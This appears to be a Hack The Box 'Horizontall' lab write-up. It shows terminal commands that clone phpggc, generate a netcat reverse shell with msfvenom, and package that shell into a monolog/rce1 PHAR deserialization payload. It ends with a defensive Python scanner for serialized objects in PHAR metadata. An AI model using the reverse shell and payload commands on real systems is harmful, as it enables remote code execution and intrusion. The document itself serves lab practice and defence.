PHPGGC: PHP Generic Gadget Chains


phpggc is a library of unserialize() payloads along with a tool to generate them, from the command line or programmatically. When encountering an unserialize on a website you don’t have the code of, or simply when trying to build an exploit, this tool allows you to generate the payload without having to go through the tedious steps of finding gadgets and combining them. It can be seen as the equivalent of frohoff’s ysoserial, but for PHP. Currently, the tool supports gadget chains such as: CodeIgniter4, Doctrine, Drupal7, Guzzle, Laravel, Magento, Monolog, Phalcon, Podio, Slim, SwiftMailer, Symfony, Wordpress, Yii and ZendFramework.

┌──(kali㉿kali)-[~/…/htb/labs/horizontall/laravel]
└─$ git clone https://github.com/ambionics/phpggc.git                                                  
Cloning into 'phpggc'...
remote: Enumerating objects: 3539, done.
remote: Counting objects: 100% (1085/1085), done.
remote: Compressing objects: 100% (430/430), done.
remote: Total 3539 (delta 652), reused 916 (delta 595), pack-reused 2454
receiving objects: 100% (3539/3539), 511.20 KiB | 8.11 MiB/s, done.
resolving deltas: 100% (1524/1524), done.

I copied the repo to the current working directory.

┌──(kali㉿kali)-[~/…/htb/labs/horizontall/laravel]
└─$ apt search phpggc
Sorting... Done
Full Text Search... Done
phpggc/kali-rolling,kali-rolling 0.20221219-0kali1 all
  Generate payloads that exploit unsafe object deserialization

It is also available in the official Kali apt repo.

Payload Generation


┌──(kali㉿kali)-[~/…/htb/labs/horizontall/laravel]
└─$ msfvenom -p cmd/unix/reverse_netcat LHOST=10.10.14.7 LPORT=1234
[-] No platform was selected, choosing Msf::Module::Platform::Unix from the payload
[-] No arch selected, selecting arch: cmd from the payload
No encoder specified, outputting raw payload
Payload size: 92 bytes
mkfifo /tmp/mbvop; nc 10.10.14.7 1234 0</tmp/mbvop | /bin/sh >/tmp/mbvop 2>&1; rm /tmp/mbvop

I will first generate a reverse shell command using msfvenom.

┌──(kali㉿kali)-[~/…/htb/labs/horizontall/laravel]
└─$ php -d'phar.readonly=0' phpggc/phpggc --phar phar -o ./payload.phar --fast-destruct monolog/rce1 system 'mkfifo /tmp/mbvop; nc 10.10.14.7 1234 0</tmp/mbvop | /bin/sh >/tmp/mbvop 2>&1; rm /tmp/mbvop'

I will then generate a PHAR payload with phpggc, containing the reverse shell command generated above.

All set.
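As an added defender-side example (my own code, not part of this writeup or of phpggc), the following Python parses the manifest of a PHAR file and reports any serialized PHP objects found in its metadata. That metadata field is where a payload produced with --phar phar carries its serialized gadget chain, so an upload or file-integrity scanner can flag such files before the application ever touches them through a phar:// path. The script constructs its own minimal PHAR-shaped sample (a stub, an empty manifest with no file entries or signature, and metadata holding only a stdClass) so it runs offline; the function names, the alias "sample" and the sample metadata are assumptions, not values from the writeup.

```python
import re
import struct

# A PHAR stub must end with this token; the binary manifest starts right after
# it (PHP tolerates an optional " ?>" and a line break in between).
HALT = b"__HALT_COMPILER();"

# PHP serialized object markers: O:<len>:"Class": (plain object) and
# C:<len>:"Class": (class implementing Serializable).
SERIALIZED_OBJECT = re.compile(rb'[OC]:(\d+):"([^"]+)":')


def find_manifest_offset(data: bytes):
    """Return the byte offset of the manifest, or None if there is no PHAR stub."""
    idx = data.find(HALT)
    if idx < 0:
        return None
    pos = idx + len(HALT)
    for suffix in (b" ?>\r\n", b" ?>\n", b"?>\r\n", b"?>\n", b" ?>", b"?>", b"\r\n", b"\n"):
        if data.startswith(suffix, pos):
            pos += len(suffix)
            break
    return pos


def parse_phar_metadata(data: bytes):
    """Return (alias, raw metadata bytes) from the PHAR manifest header.

    Manifest layout (little-endian): manifest length (4), number of files (4),
    API version (2), flags (4), alias length (4), alias, metadata length (4),
    metadata. File entries follow but are not needed for this check.
    """
    pos = find_manifest_offset(data)
    if pos is None or len(data) < pos + 18:
        return None
    _manifest_len, _num_files, _api, _flags, alias_len = struct.unpack_from("<IIHII", data, pos)
    pos += 18
    alias = data[pos:pos + alias_len]
    pos += alias_len
    (meta_len,) = struct.unpack_from("<I", data, pos)
    pos += 4
    return alias, data[pos:pos + meta_len]


def serialized_classes(blob: bytes):
    """List every class name referenced by a serialized object in the blob."""
    return [m.group(2).decode("latin-1") for m in SERIALIZED_OBJECT.finditer(blob)]


def scan_upload(data: bytes) -> dict:
    """Flag a file whose PHAR metadata carries serialized objects."""
    parsed = parse_phar_metadata(data)
    if parsed is None:
        return {"is_phar": False, "alias": "", "classes": []}
    alias, metadata = parsed
    return {
        "is_phar": True,
        "alias": alias.decode("latin-1"),
        "classes": serialized_classes(metadata),
    }


def build_sample_phar(metadata: bytes) -> bytes:
    """Constructed test data: a PHAR-shaped blob with a stub and a manifest that
    has zero file entries and the given metadata. It is not a usable archive."""
    stub = b"<?php __HALT_COMPILER(); ?>\r\n"
    alias = b"sample"  # assumed alias, chosen for this example
    rest = (struct.pack("<IHI", 0, 0x1100, 0)
            + struct.pack("<I", len(alias)) + alias
            + struct.pack("<I", len(metadata)) + metadata)
    return stub + struct.pack("<I", len(rest)) + rest


# Constructed inputs: one harmless object in the metadata, one scalar, one plain file.
SAMPLE_WITH_OBJECT = build_sample_phar(b'O:8:"stdClass":0:{}')
SAMPLE_SCALAR_META = build_sample_phar(b's:2:"ok";')
SAMPLE_PLAIN_FILE = b"just a text upload, nothing to see"

if __name__ == "__main__":
    for name, blob in (("object", SAMPLE_WITH_OBJECT),
                       ("scalar", SAMPLE_SCALAR_META),
                       ("plain", SAMPLE_PLAIN_FILE)):
        print(name, scan_upload(blob))
```

Two points worth keeping in mind when using a check like this: the phar.readonly setting that the phpggc command above disables only governs writing archives, so leaving it at its default of 1 does not stop an application from reading attacker-supplied metadata through phar://; and since PHP 8.0 the phar:// stream wrapper no longer unserializes metadata automatically, so the file-operation trigger this kind of payload relies on is specific to PHP 7 and earlier.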